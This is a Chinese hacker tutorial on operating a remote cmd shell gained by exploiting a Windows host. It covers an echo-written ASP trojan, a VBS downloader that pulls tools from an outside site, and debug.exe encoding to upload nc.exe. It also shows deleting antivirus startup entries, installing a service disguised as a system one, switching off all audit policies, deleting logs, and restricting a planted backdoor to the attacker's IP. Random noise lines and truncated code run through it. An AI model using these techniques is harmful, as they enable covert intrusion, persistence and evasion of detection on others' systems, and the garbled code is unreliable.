命令行交互

韩冰

目录
1，前言
- H0 l+ [+ r+ c7 y% a+ I2，文件传输
3，系统配置
4，网络配置
5，软件安装
6，Windows脚本
* i8 }! M8 L- Y& C0 _3 P7，附言

% f2 B: Z6 a( a) T0 C% O
. r; k3 d/ }3 s' @% J前言
Cmd Shell(命令行交互)是黑客永恒的话题，它历史悠久并且长盛不衰。本文旨在介绍和总结一些在命令行下控制Windows系统的方法。这些方法都是尽可能地利用系统自带的工具实现的。

' j# e/ E* i% P1 a
' V0 z! b: j( f/ b文件传输
0 c: _# W2 |$ l对于溢出漏洞获得的cmd shell，最大的问题就是如何上传文件。由于蠕虫病毒流行，连接ipc$所需要的139或445端口被路由封锁。再加上WinXP系统加强了对ipc$的保护，通过ipc$及默认共享上传文件的手段基本无效了。ftp和tftp是两种可行的方法，介于其已被大家熟知，本文就不介绍了。还有三种大家熟悉的办法，作为总结我再提一下：
  D: N' u7 b7 J/ K& K
1，用Echo命令写ASP木马。
8 u! J# x% w# r2 d前提当然是目标主机上已经安装了IIS。
一般的ASP木马“体积”较大，不适合直接用echo命令写入文件，这里我提供一个小巧的。
直接给出echo版：
9 P& G$ m2 }) S+ `! M1 b: f
& Y8 p* R( c; G1 e" s+ F* \@echo ^ >up.asp
6 t2 R. f5 e& G1 `% W& w( Z
  f9 C$ H& V& o8 i1 i5 X注意，只有一行，中间没有回车符。
& k( L. O8 T0 q6 O; I6 F生成的up.asp不能用浏览器访问，只能用下面这个脚本：

with wscript
if .arguments.count>dl.vbs
7 h# a: P, N: H@echo w.open "get",.arguments(0),0:w.send:if w.status^>200 then .echo "Error:"+w.status:.quit>>dl.vbs
' B8 S, J3 \0 x5 ?: Y@echo aso.type=1:aso.open:aso.write w.responsebody:aso.savetofile .arguments(1),2:end with >>dl.vbs

+ N4 F6 y  m- _) v举例——下载ps.exe并保存到c:\path下：
6 o) A- ^# k' x! B( X/ n4 |
cscript dl.vbs http://www.sometips.com/soft/ps.exe c:\path\ps.exe
" ~0 m7 g* }8 O- q$ e- i7 Q
7 z4 E; x+ _% ~! Z, g& H/ d注意，这是在远程shell中执行的。

  M" x9 \' D+ Y+ T" `! ?$ V4，Echo经过编码的任何文件，再用脚本+debug还原。
9 h; E4 _% t0 ^- U前面两个办法都不能保证穿过防火墙。而且，除非自己架Web服务器，一般的Web资源都是以压缩文件的形式提供。如果目标主机没有解压工具，还是没辙。那么只有出“杀手锏”了！
2 K$ W5 j) L9 i, n4 Y+ n
2 y/ ~: c% c1 Vecho命令加重定向x作符可以写入ASCII码小于128的字符，但大于等于128的不行。只有将本地文件重新“编码”为可显示的字符，才能方便地写入远程主机。首先能想到的就是base64编码，即email附件的编码方式。但vbs不支持位x作，因此编码和解码较复杂。更麻烦的是，脚本以二进制流方式处理文件的能力很差。（ADODB.Stream可以以流方式写文件，但我无法构造出相应的数据类型。二进制数据流可以用midb函数转成字符串，但反过来不行。我花了两天时间，还是没能解决这个问题。如果有谁能用vbs或js写任意的字节数据到文件中，恳请赐教。）

8 `& Z- `' H3 O无奈只有请debug.exe出马了。原理很多人都知道，我不介绍了，直接给出成果——编码脚本：
0 L! W# `& E5 S% O
  g8 I7 @/ h# v: [. @- Y& ?* \1 [9 w5 s/ |fp=wscript.arguments(0)
0 [& e1 E! f  i8 Qfn=right(fp,len(fp)-instrrev(fp,"\"))
with createobject("adodb.stream")
.type=1:.open:.loadfromfile fp:str=.read:sl=lenb(str)
end with
: C4 M4 T. ^" a3 k3 C" f. N/ usll=sl mod 65536:slh=sl\65536
9 r% S1 K3 o1 o& Ywith createobject("scripting.filesystemobject").opentextfile(fp&".bat",2,true)
) N0 P2 ^4 {  n.write "@echo str="""
5 }, H1 f. D5 o. gfor i=1 to sl
bt=ascb(midb(str,i,1))
+ _: H# ]& b+ \, Y( H& Lif bt>debug.vbs"+vbcrlf+"@echo +"""
next
0 z, }4 {0 H2 a5 F/ R.writeline """>>debug.vbs"+vbcrlf+"@echo with wscript.stdout:r=vbcrlf"_
+":for i=1 to len(str) step 48:.write ""e""+hex(256+(i-1)/2)"_
' Y2 Q* }& p. ~. r* X* X8 p, w+":for j=i to i+46 step 2:.write "" ""+mid(str,j,2):next:.write r:next>>debug.vbs"
$ a( |9 g' E" E' G: [! A.writeline "@echo .write ""rbx""+r+"""+hex(slh)+"""+r+""rcx""+r+"""+hex(sll)_
+"""+r+""n debug.tmp""+r+""w""+r+""q""+r:end with"_
+">>debug.vbs&&cscript //nologo debug.vbs|debug.exe>nul&&ren debug.tmp """&fn&"""&del debug.vbs"
end with
0 i: |" k" h: N+ b5 Q* R) J
将其保存为echo.vbs。假设要上传nc.exe，那么在本地命令行输入命令：

cscript echo.vbs nc.exe
: r  l% G! P6 M
也可以直接把要传输的文件的图标拖放到脚本文件的图标上。
稍等一会儿，在当前目录下将生成一个nc.exe.bat。用记事本等编辑工具打开它，可以看到如下内容：

1 `* ^+ P$ w6 o% G6 Q% x@echo str="4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000"_>>debug.vbs
@echo +"504500004C010400B98EAE340000000000000000E0000F010B010500009800000062000000000000004C00000010000000B0000000004000001000000002000004000000000000000400000000000000003001000004000000000000030000000000100000100000000010000010000000000000100000000000000000000000"_>>debug.vbs
@echo +"002001003C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000A0210100640100000000000000000000000000000000000000000000000000002E74657874000000"_>>debug.vbs
) b) `2 ?% |' H. u3 s@echo +"70970000001000000098000000040000000000000000000000000000200000602E726461746100001704000000B0000000060000009C0000000000000000000000000000400000402E646174610000004452000000C00000003E000000A20000000000000000000000000000400000C02E696461746100005C07000000200100"_>>debug.vbs
…………
…………（省略若干行）
…………
@echo +"">>debug.vbs
# ~5 L5 Y; D7 @" C  e) \0 K@echo with wscript.stdout:r=vbcrlf:for i=1 to len(str) step 48:.write "e"+hex(256+(i-1)/2):for j=i to i+46 step 2:.write " "+mid(str,j,2):next:.write r:next>>debug.vbs
@echo .write "rbx"+r+"0"+r+"rcx"+r+"E800"+r+"n debug.tmp"+r+"w"+r+"q"+r:end with>>debug.vbs&&cscript //nologo debug.vbs|debug.exe>nul&&ren debug.tmp "NC.EXE"&del debug.vbs

4 c' V/ e4 S( C. w8 W全选 －》 复制 －》 切换到远程命令行窗口 －》 粘贴。
, M0 a/ J/ [5 |% |$ q如果网速不是很慢的话，整个上传过程大约需要20秒。
  G9 e6 E) }) K, _
几点说明：
1，大的文件传输不稳定，可能会使shell死掉。所以文件越小效果越好。建议原文件不要超过100KB。
2，在传输大文件前，可以先传个小的文件作为“热身”，让16位虚拟机ntvdm.exe驻留后台。所有文件传完后，为隐蔽起见，应该把ntvdm进程杀掉。
$ q9 |0 ]3 L2 u9 k4 P$ N0 n4 N3，某些cmd shell每个命令都需要附加两个回车，那nc.exe.bat就不能直接用了。
4，单个命令的长度是有限的，所以不能只用一个echo完成全部任务。而且，对于nc提供的cmd shell，稍长一些的命令竟然会使shell自动退出（溢出了？）。你可以修改"i mod 128=0"语句中的128以调整每个echo命令的长度。每次echo的字符为这个数乘以2。
5，解码过程没有脚本参与也是可以的。使用脚本的目的是减少传输的数据量（因为压缩了数据）。如果有时间，我会写一个更完善的脚本，加强数据压缩能力，增加数据校验功能。

能上传文件当然一切都好办了，但很多x作用Windows自带的工具更方便。在你到处寻找需要的工具时，不要忘了Windows本身。

韩冰

系统配置
这节包括三方面内容：注册表、服务和组策略。

1 e! m! `; K" x. I- r. k先说注册表。很多命令行下访问注册表的工具都是交互式的，溢出产生的shell一般不能再次重定向输入/输出流，所以无法使用。
: M# p9 d4 X5 b; r" w好在系统自带的regedit.exe足够用了。

1，读取注册表
+ M+ U& R* B# ~  Z先将想查询的注册表项导出，再用type查看，比如：

C:\>regedit /e 1.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
( `- V! v% X% }5 B/ R
: ?) h% Q: w0 q  @C:\>type 1.reg | find "ortNumber"
- x' _* ~: {1 c$ H; \! t"ortNumber"=dword:00000d3d
0 g6 X% e7 p- b/ y
C:\>del 1.reg

所以终端服务的端口是3389（十六进制d3d）

' `" u3 y# m+ j1 t* X, h2，修改/删除注册表项
' r, u8 f& g: J* A4 M先echo一个reg文件，然后导入，比如：
+ N, \' P9 j7 q3 X% r3 k
8 [6 c6 t" @7 mecho Windows Registry Editor Version 5.00 >1.reg
, t, I2 O7 `& u; @+ }echo. >>1.reg
3 E5 L  C) j0 W- m: }; qecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0] >>1.reg
echo "TelnetPort"=dword:00000913 >>1.reg
4 K* l4 Z% x, J/ B+ Z+ G( h8 A0 qecho "NTLM"=dword:00000001 >>1.reg
! K" a* y8 J( B  F2 v- G% G3 g: Uecho. >>1.reg
regedit /s 1.reg
/ G: D) C, o0 W0 ^$ {2 p& k) [6 n
- r, G9 j9 R; D; e将telnet服务端口改为2323（十六进制913），NTLM认证方式为1。
7 c6 A$ m( @6 @# J: _; @
要删除一个项，在名字前面加减号，比如：

6 M% _" l' i7 t. E% z[-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Serv-U]
7 n# e7 a. y9 b; T, U
要删除一个值，在等号后面用减号，比如：
. y# x# k0 n& i. i5 \% x
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
1 ]+ q8 }! z& x"KAVRun"=-

# Y1 r! `. N" T5 m5 b/ F+ i6 K* C9 y" D3，用inf文件访问注册表
上面对注册表的三个x作，也可以用下面这个inf文件来实现：

+ h4 ?5 v, b9 d[Version]
Signature="$WINDOWS NT$"
/ c- U6 y/ i+ B1 t6 r[DefaultInstall]
AddReg=My_AddReg_Name
7 r5 `7 N7 n; X. V; q$ wDelReg=My_DelReg_Name
[My_AddReg_Name]
: C* o2 H* P/ r0 r# x1 QHKLM,SOFTWARE\Microsoft\TelnetServer\1.0,TelnetPort,0x00010001,2323
HKLM,SOFTWARE\Microsoft\TelnetServer\1.0,NTLM,0x00010001,1
[My_DelReg_Name]
HKLM,SYSTEM\CurrentControlSet\Services\Serv-U
. Y7 \4 \- g$ E7 K. w# C! I' WHKLM,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,KAVRun
! b7 M- S3 _4 A* M
将它写入c:\path\reg.inf然后用下面这个命令“安装”：

rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 c:\path\reg.inf
; O* y3 v/ k' m- b
几点说明：
1，[Version]和[DefaultInstall]是必须的，AddReg和DelReg至少要有一个。My_AddReg_Name和My_DelReg_Name可以自定义。
0x00010001表示REG_DWORD数据类型，0x00000000或省略该项(保留逗号)表示REG_SZ(字符串)。0x00020000表示REG_EXPAND_SZ。
4 c$ V) m; k' K4 |* ?1 m& ]2323也可以用0x913代替。
关于inf文件的详细信息，可以参考DDK帮助文档。
2，InstallHinfSection是大小写敏感的。它和setupapi之间只有一个逗号，没有空格。
128表示给定路径，该参数其他取值及含义参见MSDN。
特别注意，最后一个参数，必须是inf文件的全路径，不要用相对路径。
3，inf文件中的项目都是大小写不敏感的。

/ `- j$ Z, B) X/ l
. _" O+ u0 p# ^3 F$ e接下来说服务。如果想启动或停止服务，用net命令就可以。但想增加或删除服务，需要用SC，instsrv.exe，xnet.exe等工具。而这些工具系统没有自带（XP和2003自带SC)。导入注册表虽然可以，但效果不好，原因后面会提到。还是得靠inf文件出马。
2 |# D7 p3 _. \
增加一个服务：
! ?7 `/ Q" i/ A9 j
' \) H0 a1 v- S[Version]
Signature="$WINDOWS NT$"
# ~! q$ e4 _4 d, N1 _) ][DefaultInstall.Services]
1 ?2 {* H6 ?5 n' P9 w' ?  d* nAddService=inetsvr,,My_AddService_Name
+ z6 W! Q. ?* j3 f! s[My_AddService_Name]
$ k$ E. J& {9 w) m& v0 l1 F& A  [DisplayName=Windows Internet Service
Description=提供对 Internet 信息服务管理的支持。
ServiceType=0x10
2 H' w! S# {" ]5 h! ?' g7 pStartType=2
ErrorControl=0
ServiceBinary=%11%\inetsvr.exe
6 X! t/ D% u8 J* x: A3 R
保存为inetsvr.inf，然后：

rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 c:\path\inetsvr.inf
' ~$ L4 g0 Q. W  J
& K, ^6 x1 ~2 h/ W& @" D" O* d这个例子增加一个名为inetsvr的服务（是不是很像系统自带的服务，呵呵）。

& s. `, S/ F( K0 k( U- z& i几点说明：
1，最后四项分别是
服务类型：0x10为独立进程服务，0x20为共享进程服务（比如svchost）；
启动类型：0 系统引导时加载，1 OS初始化时加载，2 由SCM（服务控制管理器）自动启动，3 手动启动，4 禁用。
) t7 D3 ~! l* U8 d（注意，0和1只能用于驱动程序）
2 a" l! y% `' |错误控制：0 忽略，1 继续并警告，2 切换到LastKnownGood的设置，3 蓝屏。
& O/ a4 J, {% @, }6 S- t8 _' z# {0 ~服务程序位置：%11%表示system32目录，%10%表示系统目录(WINNT或Windows)，%12%为驱动目录system32\drivers。其他取值参见DDK。你也可以不用变量，直接使用全路径。
' A% R" r8 R: F! j' [2 N这四项是必须要有的。
' ^; }8 s# y/ b  ?! N9 E2，除例子中的六个项目，还有LoadOrderGroup、Dependencies等。不常用所以不介绍了。
3，inetsvr后面有两个逗号，因为中间省略了一个不常用的参数flags。

9 ?: Z% S  K9 n  w) T& R! Q# m1 F5 [$ _, o删除一个服务：

[Version]
Signature="$WINDOWS NT$"
[DefaultInstall.Services]
DelService=inetsvr

% {* w  V6 n+ o4 H% h# l! ]很简单，不是吗？
& B7 L0 J9 w1 i$ K# ^/ }
当然，你也可以通过导入注册表达到目的。但inf自有其优势。
1，导出一个系统自带服务的注册表项，你会发现其执行路径是这样的：
"ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\
74,00,25,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,74,\
( W4 M2 T: h$ C5 L# z00,6c,00,6e,00,74,00,73,00,76,00,72,00,2e,00,65,00,78,00,65,00,00,00
可读性太差。其实它就是%SystemRoot%\system32\tlntsvr.exe，但数据类型是REG_EXPAND_SZ。当手动导入注册表以增加服务时，这样定义ImagePath显然很不方便。如果用REG_SZ代替会有些问题——不能用环境变量了。即只能使用完整路径。用inf文件完全没有这个问题，ServiceBinary（即ImagePath）自动成为REG_EXPAND_SZ。
. W, `( y% C) y0 r7 ^3 R2，最关键的是，和用SC等工具一样，inf文件的效果是即时起效的，而导入reg后必须重启才有效。
3，inf文件会自动为服务的注册表项添加一个Security子键，使它看起来更像系统自带的服务。

韩冰

另外，AddService和DelService以及AddReg、DelReg可以同时且重复使用。即可以同时增加和删除多个服务和注册表项。详细的内容还是请查看DDK。

/ b% `& N$ F. [2 p& F' m* I
最后说说组策略。组策略是建立Windows安全环境的重要手段，尤其是在Windows域环境下。一个出色的系统管理员，应该能熟练地掌握并应用组策略。在窗口界面下访问组策略用gpedit.msc，命令行下用secedit.exe。
# k  r, @) N# [4 j) z# z
- T9 K7 M+ X; s+ M! d+ Q先看secedit命令语法：
2 z0 E) b2 Y4 ?) G0 ^. x+ fsecedit /analyze
secedit /configure
secedit /export
secedit /validate
secedit /refreshpolicy
, P- T4 Y+ x( t7 n5个命令的功能分别是分析组策略、配置组策略、导出组策略、验证模板语法和更新组策略。其中secedit /refreshpolicy 在XP/2003下被gpupdate代替。这些命令具体的语法自己在命令行下查看就知道了。

与访问注册表只需reg文件不同的是，访问组策略除了要有个模板文件(还是inf)，还需要一个安全数据库文件(sdb)。要修改组策略，必须先将模板导入安全数据库，再通过应用安全数据库来刷新组策略。来看个例子：

  s3 i" ?$ u& B3 d1 j& o* _8 W9 R假设我要将密码长度最小值设置为6，并启用“密码必须符合复杂性要求”，那么先写这么一个模板：

1 q! z: n, u) Y" v; _, L! w; b[version]
# n& ]$ I3 s4 }$ N& ^signature="$CHICAGO$"
: ^0 d  t& U8 o) m: _' C[System Access]
' E5 T% T# x" g2 z$ vMinimumPasswordLength = 6
2 |: O& i$ J6 R: c. ~. a+ P" j' GPasswordComplexity = 1

保存为gp.inf，然后导入：

! l3 I& [3 s% e( U+ Y$ Csecedit /configure /db gp.sdb /cfg gp.inf /quiet

9 p2 d7 l- c2 t0 B+ u. o这个命令执行完成后，将在当前目录产生一个gp.sdb，它是“中间产品”，你可以删除它。
2 y! y1 W6 T1 P0 J. u8 w# f. h/quiet参数表示“安静模式”，不产生日志。但根据我的试验，在2000sp4下该参数似乎不起作用，XP下正常。日志总是保存在%windir%\security\logs\scesrv.log。你也可以自己指定日志以便随后删除它。比如：

secedit /configure /db gp.sdb /cfg gp.inf /log gp.log
" u' [3 n. r7 D& d6 hdel gp.*
* a( h. S8 S9 k. q6 q1 d8 d" H1 W# w4 t
, a5 Z& ^: l- f$ f另外，在导入模板前，还可以先分析语法是否正确：
% I" A9 x3 r9 d9 H" H: b
; j; h4 W; Y) U  u& y7 i1 Fsecedit /validate gp.inf
4 A5 w6 ?( R! d" N8 O- b
那么，如何知道具体的语法呢？当然到MSDN里找啦。也有偷懒的办法，因为系统自带了一些安全模板，在%windir%\security\templates目录下。打开这些模板，基本上包含了常用的安全设置语法，一看就懂。
1 n9 I' e& n  v  A, d. I( R
再举个例子——关闭所有的“审核策略”。（它所审核的事件将记录在事件查看器的“安全性”里）。
echo版：

" \+ ^- w- k  B5 Q3 `) w  p; pecho [version] >1.inf
echo signature="$CHICAGO$" >>1.inf
echo [Event Audit] >>1.inf
echo AuditSystemEvents=0 >>1.inf
echo AuditObjectAccess=0 >>1.inf
echo AuditPrivilegeUse=0 >>1.inf
# h  z) L( R, R: qecho AuditPolicyChange=0 >>1.inf
echo AuditAccountManage=0 >>1.inf
echo AuditProcessTracking=0 >>1.inf
echo AuditDSAccess=0 >>1.inf
. i9 j' t5 B# l$ I& [5 \8 ~echo AuditAccountLogon=0 >>1.inf
" i2 s+ C3 Q) h$ @& G8 gecho AuditLogonEvents=0 >>1.inf
2 m! [; }. [" ]/ M" @secedit /configure /db 1.sdb /cfg 1.inf /log 1.log /quiet
: w% q1 b' O4 f- M& Udel 1.*
" c7 [4 C! e& U: e
也许有人会说：组策略不是保存在注册表中吗，为什么不直接修改注册表？因为不是所有的组策略都保存在注册表中。比如“审核策略”就不是。你可以用regsnap比较修改该策略前后注册表的变化。我测试的结果是什么都没有改变。只有“管理模板”这一部分是完全基于注册表的。而且，知道了具体位置，用哪个方法都不复杂。

0 F* f- y1 Q6 H, N! ~/ a& w1 I比如，XP和2003的“本地策略”－》“安全选项”增加了一个“本地帐户的共享和安全模式”策略。XP下默认的设置是“仅来宾”。这就是为什么用管理员帐号连接XP的ipc$仍然只有Guest权限的原因。可以通过导入reg文件修改它为“经典”：

echo Windows Registry Editor Version 5.00 >1.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa] >>1.reg
+ i; [. J3 f5 [! |; qecho "forceguest"=dword:00000000 >>1.reg
regedit /s 1.reg
del 1.reg

# R( Z4 n$ ]' D而相应的用inf，应该是：
  r7 z9 B. |% l$ Z
echo [version] >1.inf
* c: o$ I: m2 z$ Q7 c( ^echo signature="$CHICAGO$" >>1.inf
/ C& l" u( ^) [$ U1 Z0 a: `echo [Registry Values] >>1.inf
! q5 s* M' C% N# w& H8 r1 Becho MACHINE\System\CurrentControlSet\Control\Lsa\ForceGuest=4,0 >>1.inf
secedit /configure /db 1.sdb /cfg 1.inf /log 1.log
8 E% V( [' u. [4 O% x* h3 ndel 1.*

关于命令行下读取组策略的问题。
+ B& J6 U+ z# E) r; z4 z+ s系统默认的安全数据库位于%windir%\security\database\secedit.sdb，将它导出至inf文件：

( |  D. \. v9 t# N' X" l' |/ Ssecedit /export /cfg gp.inf /log 1.log

) y, o9 A- A1 c' _没有用/db参数指定数据库就是采用默认的。然后查看gp.inf。
7 B) q# D& A6 e+ L, f
不过，这样得到的只是组策略的一部分（即“Windows设置”）。而且，某个策略如果未配置，是不会被导出的。比如“重命名系统管理员帐户”，只有被定义了才会在inf文件中出现NewAdministratorName="xxx"。对于无法导出的其他的组策略只有通过访问注册表来获得了。
- q1 t( X+ H6 x2 `9 }. I4 N
6 c& f: q: M3 o0 D: S; B/ i此办法在XP和2003下无效——可以导出但内容基本是空的。原因不明。根据官方的资料，XP和2003显示组策略用RSoP（组策略结果集）。相应的命令行工具是gpresult。但是，它获得的是在系统启动时被附加（来自域）的组策略，单机测试结果还是“空”。所以，如果想知道某些组策略是否被设置，只有先写一个inf，再用secedit /analyze，然后查看日志了。


网络配置
2 q- L2 [, V  c% q0 R( `: cWindows自带的关于网络的命令行工具很多，比如大家熟悉的ping,tracert,ipconfig,telnet,ftp,tftp,netstat，还有不太熟悉的nbtstat,pathping,nslookup,finger,route,netsh……
这些命令又可分成三类：网络检测（如ping）、网络连接（如telnet）和网络配置（如netsh）。前面两种相对简单，本文只介绍两个网络配置工具。

/ q  Q2 M5 Q# D* Q5 ~/ C5 }$ y: s5 Snetsh
在远程shell中使用netsh首先要解决一个交互方式的问题。前面说过，很多shell不能再次重定向输出输出，所以不能在这种环境下交互地使用ftp等命令行工具。解决的办法是，一般交互式的工具都允许使用脚本（或者叫应答文件）。比如ftp -s:filename。netsh也是这样：netsh -f filename。

韩冰

netsh命令的功能非常多，可以配置IAS、DHCP、RAS、WINS、NAT服务器，TCP/IP协议，IPX协议，路由等。我们不是管理员，一般没必要了解这么多，只需用netsh来了解目标主机的网络配置信息。

1，TCP/IP配置

! ]0 R1 o6 M# {' a& J4 X+ ]echo interface ip >s
1 ~9 o+ a/ ^' j2 P5 n5 E3 p% Mecho show config >>s
" v' ]/ W) ?$ Y6 f- {) z, t1 nnetsh -f s
! b7 Q- K2 ~0 ldel s

由此你可以了解该主机有多个网卡和IP，是否是动态分配IP(DHCP)，内网IP是多少（如果有的话）。
这个命令和ipconfig /all差不多。

! w, r. o/ M( x" V! {- C注意，以下命令需要目标主机启动remoteaccess服务。如果它被禁用，请先通过导入注册表解禁，然后
' C% b6 k; @) V8 e& \net start remoteaccess
2 u: B7 u/ {* D$ p7 t
2，ARP

2 V3 e; A! h/ [: v: w! }echo interface ip >s
" }8 k! @* i4 \echo show ipnet >>s
8 x# T6 t: m5 _4 X" {1 `netsh -f s
# \3 |; i% {# ^# u+ B. Jdel s

这个比arp -a命令多一点信息。
: B' O* z' b; i; S7 y' z, z
3，TCP/UDP连接

) M/ D/ {! N4 b% g9 uecho interface ip >s
echo show tcpconn >>s
echo show udpconn >>s
, n! M) _! Z; V2 q- G) g. I6 inetsh -f s
del s
% b6 r! f* U2 w- y
* M$ f' H/ f$ u' _' d) |. n这组命令和netstat -an一样。

0 _  B+ h4 x2 |% _; ?; y4，网卡信息
如果netsh命令都有其他命令可代替，那它还有什么存在的必要呢？下面这个就找不到代替的了。
; p/ V1 \4 P" Q$ D  }! |5 D' R
echo interface ip >s
/ W. G. ]: g2 kecho show interface >>s
" G+ ~3 e& F1 `1 T) i# _netsh -f s
del s
netsh的其他功能，比如修改IP，一般没有必要使用（万一改了IP后连不上，就“叫天不应叫地不灵”了），所以全部略过。

IPSec
. G! T; e$ G8 D首先需要指出的是，IPSec和TCP/IP筛选是不同的东西，大家不要混淆了。TCP/IP筛选的功能十分有限，远不如IPSec灵活和强大。下面就说说如何在命令行下控制IPSec。
, @7 z; a# o/ C+ z8 j! S
XP系统用ipseccmd，2000下用ipsecpol。遗憾的是，它们都不是系统自带的。ipseccmd在xp系统安装盘的SUPPORT\TOOLS\SUPPORT.CAB中，ipsecpol在2000 Resource Kit里。而且，要使用ipsecpol还必须带上另外两个文件：ipsecutil.dll和text2pol.dll。三个文件一共119KB。

IPSec可以通过组策略来控制，但我找遍MSDN，也没有找到相应的安全模板的语法。已经配置好的IPSec策略也不能被导出为模板。所以，组策略这条路走不通。IPSec的设置保存在注册表中(HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local)，理论上可以通过修改注册表来配置IPSec。但很多信息以二进制形式存放，读取和修改都很困难。相比之下，上传命令行工具更方便。

; Z3 ]$ y$ T8 w( b. O% f8 f3 k# a关于ipsecpol和ipseccmd的资料，网上可以找到很多，因此本文就不细说了，只是列举一些实用的例子。
在设置IPSec策略方面，ipseccmd命令的语法和ipsecpol几乎完全一样，所以只以ipsecpol为例：

# H! \3 M. o6 x3 c: M; r5 k% c1，防御rpc-dcom攻击

ipsecpol -p myfirewall -r rpc-dcom -f *+0:135:tcp *+0:135:udp *+0:137:udp *+0:138:udp *+0:139:tcp *+0:445:tcp *+0:445:udp -n BLOCK -w reg -x

5 G3 o, o" E. O* C3 ^2 x+ r这条命令关闭了本地主机的TCP135,139,445和udp135,137,138,445端口。
; I5 F6 A' f7 @+ O2 j( j具体含义如下：
/ ^" x) f; j9 a5 q, K7 o-p myfirewall 指定策略名为myfirewall
-r rpc-dcom 指定规则名为rpc-dcom
-f …… 建立7个筛选器。*表示任何地址(源)；0表示本机地址(目标)；+表示镜像(双向)筛选。详细语法见ipsecpol -?
-n BLOCK 指定筛选x作是“阻塞”。注意，BLOCK必须是大写。
! f" l4 x$ ^$ o; U1 H1 |-w reg 将配置写入注册表，重启后仍有效。
-x 立刻激活该策略。

2，防止被ping

5 w6 j9 b. z5 {( X. ]ipsecpol -p myfirewall -r antiping -f *+0::icmp -n BLOCK -w reg -x
# b% Z! _# P1 ]- O1 Y
如果名为myfirewall的策略已存在，则antiping规则将添加至其中。
注意，该规则同时也阻止了该主机ping别人。
+ t( i, ~. W" Z# _* j' G
; C4 M5 K* s, [1 [3，对后门进行IP限制
假设你在某主机上安装了DameWare Mini Remote Control。为了保护它不被别人暴破密码或溢出，应该限制对其服务端口6129的访问。

ipsecpol -p myfw -r dwmrc_block_all -f *+0:6129:tcp -n BLOCK -w reg
3 O4 {% _* I2 w( f1 ~; O% eipsecpol -p myfw -r dwmrc_pass_me -f 123.45.67.89+0:6129:tcp -n PASS -w reg -x
9 e$ ^8 X! v+ z% z
& {/ V# d& K# G这样就只有123.45.67.89可以访问该主机的6129端口了。
) f  e" K" i. W; E/ [- X# x' o如果你是动态IP，应该根据IP分配的范围设置规则。比如：
. {' g! q! N1 g0 l) ?
2 v3 B1 N7 A. @5 A8 Z1 S8 Oipsecpol -p myfw -r dwmrc_block_all -f *+0:6129:tcp -n BLOCK -w reg
. Y+ ^3 a* w& s9 b% C5 ?ipsecpol -p myfw -r dwmrc_pass_me -f 123.45.67.*+0:6129:tcp -n PASS -w reg -x

这样就允许123.45.67.1至123.45.67.254的IP访问6129端口。
/ T  C5 X4 b' u% [, L: Y
在写规则的时候，应该特别小心，不要把自己也阻塞了。如果你不确定某个规则的效果是否和预想的一样，可以先用计划任务“留下后路”。例如：
5 H/ v6 j+ I- R4 d3 h2 E8 J
c:\>net start schedule
Task Scheduler 服务正在启动 ..
  F$ T$ v! a# k% lTask Scheduler 服务已经启动成功。
: i8 z9 S5 Q7 X- _% O
4 c& o8 s7 i6 A2 e+ `( mc:\>time /t
12:34

c:\>at 12:39 ipsecpol -p myfw -y -w reg
/ }# p$ R# H6 O( T; S新加了一项作业，其作业 ID = 1
/ }) g1 I9 y5 t2 O" l7 C
然后，你有5分钟时间设置一个myfw策略并测试它。5分钟后计划任务将停止该策略。
/ v. d; H6 o: b( M. @& v如果测试结果不理想，就删除该策略。

c:\>ipsecpol -p myfw -o -w reg
- j  F3 C" s7 `8 {
$ C  _, g7 ]/ Y* `- V* d; G2 \+ [注意，删除策略前必须先确保它已停止。不停止它的话，即使删除也会在一段时间内继续生效。持续时间取决于策略的刷新时间，默认是180分钟。

6 g0 g2 d9 Y+ n8 n# }# O4 n如果测试通过，那么就启用它。

c:\>ipsecpol -p myfw -x -w reg
/ F' H& |; A' z- {5 g. \$ w
最后说一下查看IPSec策略的办法。
% p0 S" K" |3 e' n! _5 D对于XP很简单，一条命令搞定——ipseccmd show filters
而ipsecpol没有查询的功能。需要再用一个命令行工具netdiag。它位于2000系统安装盘的SUPPORT\TOOLS\SUPPORT.CAB中。（已经上传了三个文件，也就不在乎多一个了。^_^）

netdiag需要RemoteRegistry服务的支持。所以先启动该服务：
, h" D& M8 k0 }5 {
net start remoteregistry
& F: e- J# h, v
不启动RemoteRegistry就会得到一个错误：

3 @7 N) ~+ O$ G9 K7 x1 _$ A; E[FATAL] Failed to get system information of this machine.
" B2 a/ G$ I  m2 T
0 q+ R* c* w. k+ N0 q* [- _$ v6 Nnetdiag这个工具功能十分强大，与网络有关的信息都可以获取！不过，输出的信息有时过于详细，超过命令行控制台cmd.exe的输出缓存，而不是每个远程cmd shell都可以用more命令来分页的。
' r( ]$ d& X& G
查看ipsec策略的命令是：
netdiag /debug /test:ipsec
+ D- s& |& ]; Q4 s
然后是一长串输出信息。IPSec策略位于最后。

韩冰

安装
4 g$ C6 e9 Y" K2 y( i* A# y( W一个软件/工具的安装过程，一般来说只是做两件事：拷贝文件到特定目录和修改注册表。只要搞清楚具体的内容，那么就可以自己在命令行下实现了。（不考虑安装后需要注册激活等情况）
( N' w5 r! }5 t+ d9 j% M- V+ Y5 q; p
WinPcap是个很常用的工具，但必须在窗口界面下安装。在网上也可以找到不用GUI的版本（但还是有版权页），其实我们完全可以自己做一个。
1 F. S! [' I# w+ e8 V" N
' k& n  c% \9 @4 E) _) }以WinPcap 3.0a 为例。通过比较安装前后的文件系统和注册表快照，很容易了解整个安装过程。
